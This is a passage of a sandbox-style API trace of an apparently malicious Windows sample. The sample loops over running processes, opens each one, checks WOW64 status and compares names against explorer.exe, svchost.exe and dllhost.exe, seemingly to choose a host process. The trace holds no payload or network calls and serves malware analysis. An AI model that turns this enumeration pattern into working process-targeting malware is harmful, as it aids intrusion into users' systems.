OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0209.186] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.186] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.186] CloseHandle (hObject=0xec) returned 1 [0209.186] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0209.186] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0209.186] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0209.186] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0209.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0209.186] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.186] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.186] CloseHandle (hObject=0xec) returned 1 [0209.186] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0209.186] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0209.186] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0209.186] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0209.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0209.187] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.187] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.187] CloseHandle (hObject=0xec) returned 1 [0209.187] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0209.187] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0209.187] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0209.187] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0209.188] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0209.188] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0209.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0209.189] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0209.189] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0209.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0209.190] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0209.190] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0209.191] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.191] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.191] CloseHandle (hObject=0xec) returned 1 [0209.191] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0209.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0209.191] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.191] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.191] CloseHandle (hObject=0xec) returned 1 [0209.192] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0209.192] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0209.193] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.193] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.193] CloseHandle (hObject=0xec) returned 1 [0209.193] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0209.193] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0209.193] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.193] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.193] CloseHandle (hObject=0xec) returned 1 [0209.193] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.194] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0209.194] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.194] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.194] CloseHandle (hObject=0xec) returned 1 [0209.194] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0209.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0209.195] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.195] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0209.195] CloseHandle (hObject=0xec) returned 1 [0209.195] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0209.195] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0209.195] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0209.195] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0209.196] CloseHandle (hObject=0xe8) returned 1 [0209.196] Sleep (dwMilliseconds=0x3e8) [0210.250] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0210.255] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0210.256] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0210.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0210.257] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0210.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0210.258] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0210.258] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0210.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0210.259] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0210.259] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0210.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0210.260] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0210.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0210.260] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0210.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0210.261] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0210.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0210.261] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0210.262] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0210.262] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0210.263] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0210.264] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0210.264] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0210.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0210.265] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0210.265] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0210.266] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0210.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0210.267] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.267] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.267] CloseHandle (hObject=0xec) returned 1 [0210.267] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0210.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0210.267] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0210.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0210.268] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.268] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.268] CloseHandle (hObject=0xec) returned 1 [0210.268] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0210.268] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0210.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0210.269] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0210.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0210.269] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.269] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.269] CloseHandle (hObject=0xec) returned 1 [0210.269] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0210.270] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0210.270] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0210.270] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0210.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0210.270] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.270] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.270] CloseHandle (hObject=0xec) returned 1 [0210.270] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0210.270] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0210.270] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0210.270] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0210.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0210.271] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.271] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.271] CloseHandle (hObject=0xec) returned 1 [0210.271] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0210.271] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0210.271] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0210.271] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0210.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0210.271] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.271] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.272] CloseHandle (hObject=0xec) returned 1 [0210.272] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0210.272] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0210.272] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0210.272] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0210.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0210.272] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.272] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.272] CloseHandle (hObject=0xec) returned 1 [0210.272] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0210.272] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0210.272] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0210.272] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0210.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0210.273] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.273] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.273] CloseHandle (hObject=0xec) returned 1 [0210.273] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0210.273] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0210.273] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0210.273] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0210.273] OpenProcess 